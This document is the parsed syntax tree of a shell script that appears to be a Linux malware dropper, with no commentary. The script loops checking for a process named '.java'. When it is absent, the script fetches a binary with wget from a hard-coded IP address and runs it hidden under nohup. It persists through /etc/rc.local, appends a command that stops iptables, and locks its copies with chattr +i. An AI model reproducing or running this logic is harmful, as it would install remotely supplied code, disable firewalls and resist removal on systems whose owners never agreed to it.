CommandNode(lineno=3, pos=(13, 47), parts=[
  AssignmentNode(lineno=3, pos=(13, 47), word='DOWNURL=http://61.160.247.7:223/'),
])
CommandNode(lineno=4, pos=(48, 67), parts=[
  AssignmentNode(lineno=4, pos=(48, 67), word='DOWNDIR=/usr/bin/'),
])
FunctionNode(lineno=16, pos=(69, 455), parts=[
  WordNode(lineno=6, pos=(69, 77), word='run_proc'),
  ReservedwordNode(lineno=6, pos=(77, 78), word='('),
  ReservedwordNode(lineno=6, pos=(78, 79), word=')'),
  CompoundNode(lineno=16, list=[
    ReservedwordNode(lineno=7, pos=(80, 81), word='{'),
    ListNode(lineno=16, pos=(83, 454), parts=[
        CommandNode(lineno=8, pos=(83, 103), parts=[
          WordNode(lineno=8, pos=(83, 88), word='chmod'),
          WordNode(lineno=8, pos=(89, 92), word='777'),
          WordNode(lineno=8, pos=(93, 103), word='$DOWNDIR$1', parts=[
            ParameterNode(lineno=8, pos=(93, 101), value='DOWNDIR'),
            ParameterNode(lineno=8, pos=(101, 103), value='1'),
          ]),
        ]),
        OperatorNode(lineno=9, op='\n', pos=(103, 104)),
        CommandNode(lineno=9, pos=(105, 138), parts=[
          WordNode(lineno=9, pos=(105, 110), word='nohup'),
          WordNode(lineno=9, pos=(111, 121), word='$DOWNDIR$1', parts=[
            ParameterNode(lineno=9, pos=(111, 119), value='DOWNDIR'),
            ParameterNode(lineno=9, pos=(119, 121), value='1'),
          ]),
          RedirectNode(lineno=9, output=
            WordNode(lineno=9, pos=(124, 133), word='/dev/null'), pos=(122, 133), type='>'),
          RedirectNode(input=2, lineno=9, output=1, pos=(134, 138), type='>&'),
        ]),
        OperatorNode(lineno=9, op='&', pos=(139, 140)),
        CommandNode(lineno=10, pos=(142, 192), parts=[
          WordNode(lineno=10, pos=(142, 143), word='['),
          WordNode(lineno=10, pos=(144, 146), word='-z'),
          WordNode(lineno=10, pos=(147, 190), word='`grep -w \\"iptables stop\\" /etc/rc.local`', parts=[
            CommandsubstitutionNode(command=
              CommandNode(lineno=10, pos=(149, 188), parts=[
                WordNode(lineno=10, pos=(149, 153), word='grep'),
                WordNode(lineno=10, pos=(154, 156), word='-w'),
                WordNode(lineno=10, pos=(157, 167), word='"iptables'),
                WordNode(lineno=10, pos=(168, 174), word='stop"'),
                WordNode(lineno=10, pos=(175, 188), word='/etc/rc.local'),
              ]), lineno=10, pos=(148, 189)),
          ]),
          WordNode(lineno=10, pos=(191, 192), word=']'),
        ]),
        OperatorNode(lineno=10, op='&&', pos=(193, 195)),
        CommandNode(lineno=10, pos=(196, 245), parts=[
          WordNode(lineno=10, pos=(196, 200), word='echo'),
          WordNode(lineno=10, pos=(201, 228), word='/etc/init.d/iptables stop'),
          RedirectNode(lineno=10, output=
            WordNode(lineno=10, pos=(232, 245), word='/etc/rc.local'), pos=(229, 245), type='>>'),
        ]),
        OperatorNode(lineno=11, op='\n', pos=(245, 246)),
        CommandNode(lineno=11, pos=(247, 290), parts=[
          WordNode(lineno=11, pos=(247, 248), word='['),
          WordNode(lineno=11, pos=(249, 251), word='-z'),
          WordNode(lineno=11, pos=(252, 288), word='`grep -w $DOWNDIR$1 /etc/rc.local`', parts=[
            CommandsubstitutionNode(command=
              CommandNode(lineno=11, pos=(254, 286), parts=[
                WordNode(lineno=11, pos=(254, 258), word='grep'),
                WordNode(lineno=11, pos=(259, 261), word='-w'),
                WordNode(lineno=11, pos=(262, 272), word='$DOWNDIR$1', parts=[
                  ParameterNode(lineno=11, pos=(262, 270), value='DOWNDIR'),
                  ParameterNode(lineno=11, pos=(270, 272), value='1'),
                ]),
                WordNode(lineno=11, pos=(273, 286), word='/etc/rc.local'),
              ]), lineno=11, pos=(253, 287)),
          ]),
          WordNode(lineno=11, pos=(289, 290), word=']'),
        ]),
        OperatorNode(lineno=11, op='&&', pos=(291, 293)),
        CommandNode(lineno=11, pos=(294, 330), parts=[
          WordNode(lineno=11, pos=(294, 298), word='echo'),
          WordNode(lineno=11, pos=(299, 313), word='$DOWNDIR$1 &', parts=[
            ParameterNode(lineno=11, pos=(300, 308), value='DOWNDIR'),
            ParameterNode(lineno=11, pos=(308, 310), value='1'),
          ]),
          RedirectNode(lineno=11, output=
            WordNode(lineno=11, pos=(317, 330), word='/etc/rc.local'), pos=(314, 330), type='>>'),
        ]),
        OperatorNode(lineno=12, op='\n', pos=(330, 331)),
        CommandNode(lineno=12, pos=(332, 348), parts=[
          WordNode(lineno=12, pos=(332, 333), word='['),
          WordNode(lineno=12, pos=(334, 336), word='-f'),
          WordNode(lineno=12, pos=(337, 346), word='/etc/$1', parts=[
            ParameterNode(lineno=12, pos=(343, 345), value='1'),
          ]),
          WordNode(lineno=12, pos=(347, 348), word=']'),
        ]),
        OperatorNode(lineno=12, op='&&', pos=(349, 351)),
        CommandNode(lineno=12, pos=(352, 369), parts=[
          WordNode(lineno=12, pos=(352, 358), word='chattr'),
          WordNode(lineno=12, pos=(359, 361), word='-i'),
          WordNode(lineno=12, pos=(362, 369), word='/etc/$1', parts=[
            ParameterNode(lineno=12, pos=(367, 369), value='1'),
          ]),
        ]),
        OperatorNode(lineno=12, op='&&', pos=(370, 372)),
        CommandNode(lineno=12, pos=(373, 388), parts=[
          WordNode(lineno=12, pos=(373, 376), word='rm'),
          WordNode(lineno=12, pos=(377, 380), word='-rf'),
          WordNode(lineno=12, pos=(381, 388), word='/etc/$1', parts=[
            ParameterNode(lineno=12, pos=(386, 388), value='1'),
          ]),
        ]),
        OperatorNode(lineno=13, op='\n', pos=(388, 389)),
        CommandNode(lineno=13, pos=(390, 412), parts=[
          WordNode(lineno=13, pos=(390, 393), word='cp'),
          WordNode(lineno=13, pos=(394, 404), word='$DOWNDIR$1', parts=[
            ParameterNode(lineno=13, pos=(394, 402), value='DOWNDIR'),
            ParameterNode(lineno=13, pos=(402, 404), value='1'),
          ]),
          WordNode(lineno=13, pos=(405, 412), word='/etc/$1', parts=[
            ParameterNode(lineno=13, pos=(410, 412), value='1'),
          ]),
        ]),
        OperatorNode(lineno=14, op='\n', pos=(412, 413)),
        CommandNode(lineno=14, pos=(414, 431), parts=[
          WordNode(lineno=14, pos=(414, 420), word='chattr'),
          WordNode(lineno=14, pos=(421, 423), word='+i'),
          WordNode(lineno=14, pos=(424, 431), word='/etc/$1', parts=[
            ParameterNode(lineno=14, pos=(429, 431), value='1'),
          ]),
        ]),
        OperatorNode(lineno=15, op='\n', pos=(431, 432)),
        CommandNode(lineno=15, pos=(433, 453), parts=[
          WordNode(lineno=15, pos=(433, 439), word='chattr'),
          WordNode(lineno=15, pos=(440, 442), word='+i'),
          WordNode(lineno=15, pos=(443, 453), word='$DOWNDIR$1', parts=[
            ParameterNode(lineno=15, pos=(443, 451), value='DOWNDIR'),
            ParameterNode(lineno=15, pos=(451, 453), value='1'),
          ]),
        ]),
        OperatorNode(lineno=16, op='\n', pos=(453, 454)),
      ]),
    ReservedwordNode(lineno=16, pos=(454, 455), word='}'),
  ], pos=(80, 455)),
])
FunctionNode(lineno=28, pos=(457, 662), parts=[
  WordNode(lineno=18, pos=(457, 467), word='check_proc'),
  ReservedwordNode(lineno=18, pos=(467, 468), word='('),
  ReservedwordNode(lineno=18, pos=(468, 469), word=')'),
  CompoundNode(lineno=28, list=[
    ReservedwordNode(lineno=19, pos=(470, 471), word='{'),
    CompoundNode(lineno=27, list=[
      IfNode(lineno=27, pos=(473, 660), parts=[
        ReservedwordNode(lineno=20, pos=(473, 475), word='if'),
        ListNode(lineno=20, pos=(476, 504), parts=[
            CommandNode(lineno=20, pos=(476, 503), parts=[
              WordNode(lineno=20, pos=(476, 477), word='['),
              WordNode(lineno=20, pos=(478, 480), word='-z'),
              WordNode(lineno=20, pos=(481, 501), word='`ps -A|grep -w $1`', parts=[
                CommandsubstitutionNode(command=
                  PipelineNode(lineno=20, pos=(483, 499), parts=[
                    CommandNode(lineno=20, pos=(483, 488), parts=[
                      WordNode(lineno=20, pos=(483, 485), word='ps'),
                      WordNode(lineno=20, pos=(486, 488), word='-A'),
                    ]),
                    PipeNode(lineno=20, pipe='|', pos=(488, 489)),
                    CommandNode(lineno=20, pos=(489, 499), parts=[
                      WordNode(lineno=20, pos=(489, 493), word='grep'),
                      WordNode(lineno=20, pos=(494, 496), word='-w'),
                      WordNode(lineno=20, pos=(497, 499), word='$1', parts=[
                        ParameterNode(lineno=20, pos=(497, 499), value='1'),
                      ]),
                    ]),
                  ]), lineno=20, pos=(482, 500)),
              ]),
              WordNode(lineno=20, pos=(502, 503), word=']'),
            ]),
            OperatorNode(lineno=20, op=';', pos=(503, 504)),
          ]),
        ReservedwordNode(lineno=20, pos=(504, 508), word='then'),
        ListNode(lineno=27, pos=(511, 650), parts=[
            CompoundNode(lineno=23, list=[
              IfNode(lineno=23, pos=(511, 599), parts=[
                ReservedwordNode(lineno=21, pos=(511, 513), word='if'),
                ListNode(lineno=21, pos=(514, 536), parts=[
                    CommandNode(lineno=21, pos=(514, 535), parts=[
                      WordNode(lineno=21, pos=(514, 515), word='['),
                      WordNode(lineno=21, pos=(516, 517), word='!'),
                      WordNode(lineno=21, pos=(518, 520), word='-f'),
                      WordNode(lineno=21, pos=(521, 533), word='$DOWNDIR$1', parts=[
                        ParameterNode(lineno=21, pos=(522, 530), value='DOWNDIR'),
                        ParameterNode(lineno=21, pos=(530, 532), value='1'),
                      ]),
                      WordNode(lineno=21, pos=(534, 535), word=']'),
                    ]),
                    OperatorNode(lineno=21, op=';', pos=(535, 536)),
                  ]),
                ReservedwordNode(lineno=21, pos=(536, 540), word='then'),
                CommandNode(lineno=22, pos=(544, 594), parts=[
                  WordNode(lineno=22, pos=(544, 548), word='wget'),
                  WordNode(lineno=22, pos=(549, 561), word='$DOWNURL$1', parts=[
                    ParameterNode(lineno=22, pos=(550, 558), value='DOWNURL'),
                    ParameterNode(lineno=22, pos=(558, 560), value='1'),
                  ]),
                  WordNode(lineno=22, pos=(562, 564), word='-O'),
                  WordNode(lineno=22, pos=(565, 577), word='$DOWNDIR$1', parts=[
                    ParameterNode(lineno=22, pos=(566, 574), value='DOWNDIR'),
                    ParameterNode(lineno=22, pos=(574, 576), value='1'),
                  ]),
                  RedirectNode(lineno=22, output=
                    WordNode(lineno=22, pos=(580, 589), word='/dev/null'), pos=(578, 589), type='>'),
                  RedirectNode(input=2, lineno=22, output=1, pos=(590, 594), type='>&'),
                ]),
                ReservedwordNode(lineno=23, pos=(597, 599), word='fi'),
              ]),
            ], pos=(511, 599)),
            OperatorNode(lineno=24, op='\n', pos=(599, 600)),
            CompoundNode(lineno=26, list=[
              IfNode(lineno=26, pos=(602, 649), parts=[
                ReservedwordNode(lineno=24, pos=(602, 604), word='if'),
                ListNode(lineno=24, pos=(605, 625), parts=[
                    CommandNode(lineno=24, pos=(605, 624), parts=[
                      WordNode(lineno=24, pos=(605, 606), word='['),
                      WordNode(lineno=24, pos=(607, 609), word='-f'),
                      WordNode(lineno=24, pos=(610, 622), word='$DOWNDIR$1', parts=[
                        ParameterNode(lineno=24, pos=(611, 619), value='DOWNDIR'),
                        ParameterNode(lineno=24, pos=(619, 621), value='1'),
                      ]),
                      WordNode(lineno=24, pos=(623, 624), word=']'),
                    ]),
                    OperatorNode(lineno=24, op=';', pos=(624, 625)),
                  ]),
                ReservedwordNode(lineno=24, pos=(625, 629), word='then'),
                CommandNode(lineno=25, pos=(633, 644), parts=[
                  WordNode(lineno=25, pos=(633, 641), word='run_proc'),
                  WordNode(lineno=25, pos=(642, 644), word='$1', parts=[
                    ParameterNode(lineno=25, pos=(642, 644), value='1'),
                  ]),
                ]),
                ReservedwordNode(lineno=26, pos=(647, 649), word='fi'),
              ]),
            ], pos=(602, 649)),
            OperatorNode(lineno=27, op='\n', pos=(649, 650)),
          ]),
        ReservedwordNode(lineno=27, pos=(658, 660), word='fi'),
      ]),
    ], pos=(473, 660)),
    ReservedwordNode(lineno=28, pos=(661, 662), word='}'),
  ], pos=(470, 662)),
])
CompoundNode(lineno=34, list=[
  WhileNode(lineno=34, pos=(664, 712), parts=[
    ReservedwordNode(lineno=30, pos=(664, 669), word='while'),
    CommandNode(lineno=30, pos=(670, 675), parts=[
      WordNode(lineno=30, pos=(670, 671), word='['),
      WordNode(lineno=30, pos=(672, 673), word='1'),
      WordNode(lineno=30, pos=(674, 675), word=']'),
    ]),
    ReservedwordNode(lineno=31, pos=(676, 678), word='do'),
    ListNode(lineno=34, pos=(680, 708), parts=[
        CommandNode(lineno=32, pos=(680, 698), parts=[
          WordNode(lineno=32, pos=(680, 690), word='check_proc'),
          WordNode(lineno=32, pos=(691, 698), word='.java'),
        ]),
        OperatorNode(lineno=33, op='\n', pos=(698, 699)),
        CommandNode(lineno=33, pos=(700, 707), parts=[
          WordNode(lineno=33, pos=(700, 705), word='sleep'),
          WordNode(lineno=33, pos=(706, 707), word='3'),
        ]),
        OperatorNode(lineno=34, op='\n', pos=(707, 708)),
      ]),
    ReservedwordNode(lineno=34, pos=(708, 712), word='done'),
  ]),
], pos=(664, 712))
